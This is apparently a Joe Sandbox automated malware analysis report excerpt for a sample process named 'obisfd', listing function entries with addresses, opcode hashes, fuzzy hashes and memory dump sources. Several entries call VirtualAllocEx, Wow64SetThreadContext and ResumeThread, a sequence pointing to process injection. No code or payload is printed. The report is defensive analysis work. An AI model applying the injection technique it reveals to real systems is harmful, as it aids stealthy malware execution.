                                                                                            • Opcode ID: 849a639f7af91c310ab520da6d000c066da44ce22c574fa41900e896a6aa33e0
                                                                                            • Instruction ID: 624fc87ac60adfcc0d5cb112c313caa14f4ebb6e71e49321ac3cfb5e9da2ed22
                                                                                            • Opcode Fuzzy Hash: 849a639f7af91c310ab520da6d000c066da44ce22c574fa41900e896a6aa33e0
                                                                                            • Instruction Fuzzy Hash: 704198B4D00258DFCF00CFAAD884AEEFBB1BB59310F20942AE814BB210D775A955DF65
                                                                                            Function 002CDB48 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 662 2cdb48-2cdc10 VirtualAllocEx 665 2cdc19-2cdc63 662->665 666 2cdc12-2cdc18 662->666 666->665
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002CDBFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: bbf5f03345c8fcfecc15a5815bc4a851e5a311ce5b38d698a6dce962098d1768
                                                                                            • Instruction ID: c815f6d92ac90de142fba3d8acfb8a32d14a7086a92872fbf159d527abecfabe
                                                                                            • Opcode Fuzzy Hash: bbf5f03345c8fcfecc15a5815bc4a851e5a311ce5b38d698a6dce962098d1768
                                                                                            • Instruction Fuzzy Hash: 2741A8B8D00258DFCF10CFA9D984AEEBBB1BB49314F20942AE814BB210D775A955CF65
                                                                                            Function 002CDB50 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 671 2cdb50-2cdc10 VirtualAllocEx 674 2cdc19-2cdc63 671->674 675 2cdc12-2cdc18 671->675 675->674
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002CDBFA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 7d1c5f6dbac81ac1efcf7cf914230e843d15b56ac7718697f22825461f9233ec
                                                                                            • Instruction ID: 5fd0bc6743e8686ed5449ab660fc26f182a0be258cba3c6f1f199f22f8119f62
                                                                                            • Opcode Fuzzy Hash: 7d1c5f6dbac81ac1efcf7cf914230e843d15b56ac7718697f22825461f9233ec
                                                                                            • Instruction Fuzzy Hash: 174199B8D00258DFCF10CFA9D984ADEBBB1BB49310F20942AE814BB210D775A955DFA5
                                                                                            Function 002CD5E1 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 680 2cd5e1-2cd648 682 2cd65f-2cd6ad Wow64SetThreadContext 680->682 683 2cd64a-2cd65c 680->683 685 2cd6af-2cd6b5 682->685 686 2cd6b6-2cd702 682->686 683->682 685->686
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 002CD697
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: efe7310ccf2038ef8963a13cbc504edcf001860763e58813cfb3e44a49f4ed75
                                                                                            • Instruction ID: a9c16fe741115886c9a614ed41e3254c42f3036cfd5680092a12f735c457ab32
                                                                                            • Opcode Fuzzy Hash: efe7310ccf2038ef8963a13cbc504edcf001860763e58813cfb3e44a49f4ed75
                                                                                            • Instruction Fuzzy Hash: 8C41DCB4D10258DFDB10CFA9D884AEEFBB1BF48314F24842AE418BB240D778A945CF54
                                                                                            Function 002CD5E8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 691 2cd5e8-2cd648 693 2cd65f-2cd6ad Wow64SetThreadContext 691->693 694 2cd64a-2cd65c 691->694 696 2cd6af-2cd6b5 693->696 697 2cd6b6-2cd702 693->697 694->693 696->697
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 002CD697
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 290f4a199dd2ef6220d7f842b568b4ce2dc9500ca1318a3e20eac374f2db3024
                                                                                            • Instruction ID: 11a4d079409872c92954d9250676631555732e4e334ebe784aafe501b2c7201e
                                                                                            • Opcode Fuzzy Hash: 290f4a199dd2ef6220d7f842b568b4ce2dc9500ca1318a3e20eac374f2db3024
                                                                                            • Instruction Fuzzy Hash: 8441CCB4D10218DFDB10CFAAD884AEEFBB5BF49314F24842AE418B7240D778A945CF54
                                                                                            Function 002CD0B8 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 702 2cd0b8-2cd154 ResumeThread 706 2cd15d-2cd19f 702->706 707 2cd156-2cd15c 702->707 707->706
                                                                                            APIs
                                                                                            • ResumeThread.KERNELBASE(?), ref: 002CD13E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 6828e8d067af31a15633835bdd586881c56d44740695b4b7a83349e831873182
                                                                                            • Instruction ID: 457aa33c2feff920bbf6cd7871adba0d317cd7c319421142114514ddd9d72e36
                                                                                            • Opcode Fuzzy Hash: 6828e8d067af31a15633835bdd586881c56d44740695b4b7a83349e831873182
                                                                                            • Instruction Fuzzy Hash: 0331CCB4D10218DFDB14CFA9D884AEEFBB4AF49310F24942AE818B7300C775A901CF94
                                                                                            Function 002CD0C0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 712 2cd0c0-2cd154 ResumeThread 715 2cd15d-2cd19f 712->715 716 2cd156-2cd15c 712->716 716->715
                                                                                            APIs
                                                                                            • ResumeThread.KERNELBASE(?), ref: 002CD13E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: e84c3c1842c7469198c18ca06d9064bf49ffeec15f0b41a5f9b23ef7c5d108a5
                                                                                            • Instruction ID: 2a406f107a287889f9d576f4bbb26aa53757ce3b06808957d3950e7be09e069d
                                                                                            • Opcode Fuzzy Hash: e84c3c1842c7469198c18ca06d9064bf49ffeec15f0b41a5f9b23ef7c5d108a5
                                                                                            • Instruction Fuzzy Hash: A431BBB4D112189FDF14CFAAD884ADEFBB5AF89314F24942AE818B7300D775A905CF94
                                                                                            Function 00D30395 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: d2ea6434f32131ea308859dbae09d94091d05ab3bf6591624d865b24f7e81d5d
                                                                                            • Instruction ID: 33a340709dfb5bcc290bc18fdc5bd75344d5d638520fa2e0dddd8ecd85c72499
                                                                                            • Opcode Fuzzy Hash: d2ea6434f32131ea308859dbae09d94091d05ab3bf6591624d865b24f7e81d5d
                                                                                            • Instruction Fuzzy Hash: 16219F35946228CFEB60CF64C994BEDBBB5AF09305F1481D9940DA72A1C7719E81DF50
                                                                                            Function 00D3030D Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: c5b737e7ad84e2dc8602cd286b252c1944d1e937d816f443e7db2af778785512
                                                                                            • Instruction ID: 97ede1c30b7ec3ce17b4db42c6940845981b9500373d272ff46960117af69f8b
                                                                                            • Opcode Fuzzy Hash: c5b737e7ad84e2dc8602cd286b252c1944d1e937d816f443e7db2af778785512
                                                                                            • Instruction Fuzzy Hash: 6211CE75906228CFDB64CF68C894BECBBB5AB09304F2485D9D40DA2261C7319E80CF20
                                                                                            Function 00D30191 Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f02ed34553ed679611c00c3b8fa534d519342f1b7170dbf4f3157683ff6827fe
                                                                                            • Instruction ID: aba1f26e09e7e259447d58da21b328b9fc18f8fc7b4dccc074c193184df743ea
                                                                                            • Opcode Fuzzy Hash: f02ed34553ed679611c00c3b8fa534d519342f1b7170dbf4f3157683ff6827fe
                                                                                            • Instruction Fuzzy Hash: 2D411A71D4121ADFDB64CF55CC80BE9BBB5BF89300F2492EAD509A6240EB709AC4DF50
                                                                                            Function 00D3010D Relevance: .1, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38bb5ed0edbf52e7c5c1eef9e9882a5c9399d0c166aa5f8e905f669a1fd342c6
                                                                                            • Instruction ID: 5e2f7a50ee49e8b3807aea16415d4078e21430eaa4e38f34926156468ebe59ec
                                                                                            • Opcode Fuzzy Hash: 38bb5ed0edbf52e7c5c1eef9e9882a5c9399d0c166aa5f8e905f669a1fd342c6
                                                                                            • Instruction Fuzzy Hash: 2941F274A08228CFDB64CF68C954BE9BBB5BF5A300F2091EAD449A7640DB709AC1DF50
                                                                                            Function 00D3029F Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d83ea4c4764d5261d70fb8c14dfc3caec2b96bacaee486538710f9512680498
                                                                                            • Instruction ID: 55254e8b7f72c97d38fc684026f446bda778fd0a55e74bd318d82e1468414429
                                                                                            • Opcode Fuzzy Hash: 7d83ea4c4764d5261d70fb8c14dfc3caec2b96bacaee486538710f9512680498
                                                                                            • Instruction Fuzzy Hash: 4C311734909228CFCBA0CF64CC54BEDBBB5BF49300F2481EAD449A7251D7355A85DF14
                                                                                            Function 00D303BE Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9779f22ec93da0656f495849eac8f5ddc04c4cd4b162005f804995b47e851e16
                                                                                            • Instruction ID: feb2191e166104ad1aefec2e3337492655cc45457db22fe4861ef5baebb693d9
                                                                                            • Opcode Fuzzy Hash: 9779f22ec93da0656f495849eac8f5ddc04c4cd4b162005f804995b47e851e16
                                                                                            • Instruction Fuzzy Hash: D131F138D08218CFCB64CFA4CD94BECBBB5AF89305F2490A9944DAB241D7349A85DF50
                                                                                            Function 001CD01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404771701.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_1cd000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f484260a754551b4dc9a9b16d2fcec98a5c542ed8f10caba6095aaadc10e1f97
                                                                                            • Instruction ID: ae724b45c8569ce6835283de8d94452683d118979040cececea754c852e2f193
                                                                                            • Opcode Fuzzy Hash: f484260a754551b4dc9a9b16d2fcec98a5c542ed8f10caba6095aaadc10e1f97
                                                                                            • Instruction Fuzzy Hash: 0721AF75604340DFEB14DF18E884F16BBA5EB94714F34C6BDE8494B246C336D866CBA2
                                                                                            Function 001CD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404771701.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_1cd000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0a3c85774d6172bda06e306d08f0cf60f829216e498856237ebbd07400b8e010
                                                                                            • Instruction ID: 285402977fa1c5cabfd646f357e21addcbc56595adaae37c80f245dd9019302d
                                                                                            • Opcode Fuzzy Hash: 0a3c85774d6172bda06e306d08f0cf60f829216e498856237ebbd07400b8e010
                                                                                            • Instruction Fuzzy Hash: 3021B0B5604340EFEB05DF14E9C4F26BBA5EB94314F24C6BDE8494B242C336D846CB62
                                                                                            Function 001CD006 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404771701.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_1cd000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 927f98408d6154288bae43577f96b92e62e3e6a2bb4278a576e914f891d02b84
                                                                                            • Instruction ID: c9421a841f80bceefc5368f5e0fadf04723761c9a706616844af656d0d06efbf
                                                                                            • Opcode Fuzzy Hash: 927f98408d6154288bae43577f96b92e62e3e6a2bb4278a576e914f891d02b84
                                                                                            • Instruction Fuzzy Hash: F421B0755083809FCB02CF14D994B11BF71EB56314F28C5EAD8498F267C33AD81ACBA2
                                                                                            Function 001CD1CF Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404771701.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_1cd000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                            • Instruction ID: f3169f1c7f21df196880630693e603e895d922186409ad7a3b4cec0194dc7aa3
                                                                                            • Opcode Fuzzy Hash: b5c68ee77780e459a8ed82bc23ea6c7dcb049b3dc04f4803eb97a4645ef7b5e5
                                                                                            • Instruction Fuzzy Hash: 5B118B75504280DFDB11CF14D9C4B15BFA1FB94314F24C6AED8494B656C33AD85ACBA2
                                                                                            Function 00D30518 Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf74b630a877ffb0c7d9b91b3592126cfafd6b56b44fbed48c2fed5af62ee82d
                                                                                            • Instruction ID: 0fee394f70f30783fe1ebe964361df3d19f2710c47b46a0f173b5c26a9c20658
                                                                                            • Opcode Fuzzy Hash: cf74b630a877ffb0c7d9b91b3592126cfafd6b56b44fbed48c2fed5af62ee82d
                                                                                            • Instruction Fuzzy Hash: 5711D378E08218CFCB64CF94CD547ECBBB9AF89305F2491A9950DAB355D7349A85DF00
                                                                                            Function 00D3040C Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0dd91466c7f590ef9b6ab1c2ba37c9dcc3a3e8e45151a5157b75e1cd6d2429da
                                                                                            • Instruction ID: 90d10ac1abacb87c3a2638cc92f412a3228672dcce3cc62a0a2798ad040b0b47
                                                                                            • Opcode Fuzzy Hash: 0dd91466c7f590ef9b6ab1c2ba37c9dcc3a3e8e45151a5157b75e1cd6d2429da
                                                                                            • Instruction Fuzzy Hash: 9811B378D08218CFDB64CFA4CD547ECBBB5AF89305F2090A9940DAB355D7305A85DF00
                                                                                            Function 00D30571 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5fda0c6b10fce6731b6cf6350a17fc2216c1ddee57b116ea88ca36d56efb841c
                                                                                            • Instruction ID: ea822a753e92de566152bf7d89f8dd4e0e81f67cdb5a11a7c55f4e74b1d47141
                                                                                            • Opcode Fuzzy Hash: 5fda0c6b10fce6731b6cf6350a17fc2216c1ddee57b116ea88ca36d56efb841c
                                                                                            • Instruction Fuzzy Hash: 85116D38808219CFCB24CF50C864BF8BFB4AF49314F1482DA845967292D734DB86DF60
                                                                                            Function 00D30251 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f7108d3205a576c2bd5ef88e5367f9cd70c56f088a54ef6e5456ca5b56389b75
                                                                                            • Instruction ID: 1438dc8317f2bf970f0f549153ded0c1de32589c7545227d76f74657bb656d3b
                                                                                            • Opcode Fuzzy Hash: f7108d3205a576c2bd5ef88e5367f9cd70c56f088a54ef6e5456ca5b56389b75
                                                                                            • Instruction Fuzzy Hash: 2111F074906228CFDB60CF68CD90BECBBB9BF49300F2091A9D409A7255C730AE85CF50
                                                                                            Function 00D30751 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8b7b7d6d33d3cc8ef776e0c9854bf197c16d6312ac8c5d09e6838e089dcee155
                                                                                            • Instruction ID: 60de62dac9d572cf63c8f14c9bee57710f8a851dbe012a303c952ce8210cbf41
                                                                                            • Opcode Fuzzy Hash: 8b7b7d6d33d3cc8ef776e0c9854bf197c16d6312ac8c5d09e6838e089dcee155
                                                                                            • Instruction Fuzzy Hash: 85011238909258CFCB60CF64CD94BE8BFB9AB89300F2450A99049AB352C6745A85CF00
                                                                                            Function 00D3084D Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 522e936e92d20bb50137f1e3fe044c02797b69b8856081c549b7889b5b85cb42
                                                                                            • Instruction ID: 3296b28b75b73c52d05a777ca363427919007a25ad79e2d7399dafdb0e6c47c5
                                                                                            • Opcode Fuzzy Hash: 522e936e92d20bb50137f1e3fe044c02797b69b8856081c549b7889b5b85cb42
                                                                                            • Instruction Fuzzy Hash: 20011DB5904228CFDB64CF58C880BEDBBF8AB4D310F2081AAD54DE3281C7309A85CF64
                                                                                            Function 00D3047B Relevance: .0, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb95a2d80fee4c1130301acb20792ab94c7b012e44769f0d47da39b937d34c7e
                                                                                            • Instruction ID: ce738d4b53589fbd79a956eb71a21b3ba2711f789007528671d99c1bfafcf2d5
                                                                                            • Opcode Fuzzy Hash: bb95a2d80fee4c1130301acb20792ab94c7b012e44769f0d47da39b937d34c7e
                                                                                            • Instruction Fuzzy Hash: 35016D35808218DFCB24CF54D9146E8BFB4EF09315F1881EAC44DA7292D7308A85DF60
                                                                                            Function 00D304A6 Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a19aa1cb5a6a3278658936beafe33487123043cea7c6fff95155624b8e17647
                                                                                            • Instruction ID: 815cdf32c4c9d3e3d235e2d64eb69919806268df2503b2737d2a368cb0c9629d
                                                                                            • Opcode Fuzzy Hash: 9a19aa1cb5a6a3278658936beafe33487123043cea7c6fff95155624b8e17647
                                                                                            • Instruction Fuzzy Hash: A2F04F74808258CFCB64DF24C858EE8BBB5FB09314F1481EAC44D6A292C7318B85DF50
                                                                                            Function 00D30382 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 94c6e79c9a1bd432a1ff0128ccfff5f800b385c17e9baeda60a9c9ae311e2108
                                                                                            • Instruction ID: 855c881a30978d45f54100f5fc41531bc8a993aa5dcdb9e96946a4f186648926
                                                                                            • Opcode Fuzzy Hash: 94c6e79c9a1bd432a1ff0128ccfff5f800b385c17e9baeda60a9c9ae311e2108
                                                                                            • Instruction Fuzzy Hash: 21F03735904228DFCB60CF54CC58BEDBBB5AF49300F1480D9900DA2261CB715AC5DF50
                                                                                            Function 00D305FF Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.405424707.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d30000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f2e30ad2cadd6f6c318c2c85453a3cbdb556698e3762ad3674bc3228a111d5a
                                                                                            • Instruction ID: 65ff19b0f0719f94d69514e980304c53769e1def893b74af2e178a52c537c406
                                                                                            • Opcode Fuzzy Hash: 4f2e30ad2cadd6f6c318c2c85453a3cbdb556698e3762ad3674bc3228a111d5a
                                                                                            • Instruction Fuzzy Hash: 43F06535908214CFCB15CF10C8657E8BBB5AF49310F1480D9854CA7252D335DB96CF60

                                                                                            Non-executed Functions

                                                                                            Function 002CBEC9 Relevance: .3, Instructions: 321COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d357dcde78675d445f5947db05e42aab44f9a8b7f60cb2a560f5dd09d6e44c8d
                                                                                            • Instruction ID: e0f60286a82f93a45bf8e76984d9034c7683e34e6f70488e7a5072be0e9af0be
                                                                                            • Opcode Fuzzy Hash: d357dcde78675d445f5947db05e42aab44f9a8b7f60cb2a560f5dd09d6e44c8d
                                                                                            • Instruction Fuzzy Hash: 1FE13B74E102598FDB14DFA9C580AADFBF2BF89301F248169D819AB356D730AD41CFA1
                                                                                            Function 002CD1B0 Relevance: .3, Instructions: 312COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.404833474.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_2c0000_obisfd.jbxd
